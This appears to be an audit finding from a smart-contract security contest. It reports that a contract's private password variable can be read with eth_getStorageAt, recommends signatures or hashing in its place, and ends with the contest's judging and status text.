Password is readable via `eth_getStorageAt`
Summary
Despite the private visibility of s_password variable, it may still be read via direct blockchain interaction.
Vulnerability Details
A special note in Solidity documentation is given on that case:
Everything that is inside a contract is visible to all observers external to the blockchain. Making something private only prevents other contracts from accessing and modifying the information, but it will still be visible to the whole world outside of the blockchain.
This means that even if the contracts are unable to read the contract data, storage can still be accessed via eth_getStorageAt. Here is the simplified example (works only with short strings) for the contract, that is getting the stored data:
Impact
High
Tools Used
Hardhat
Recommendations
Storing the original passwords is generally considered as a bad security practice, and for offchain interactions password hashing and salt are used generally (https://en.wikipedia.org/wiki/Salt_(cryptography)) to fight various attack vectors. However, since we're talking about the blockchain, general approach would be consuming the signatures instead of using passwords, as private/public key pair is better representation of the user rather than a password.
Lead Judging Commences
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.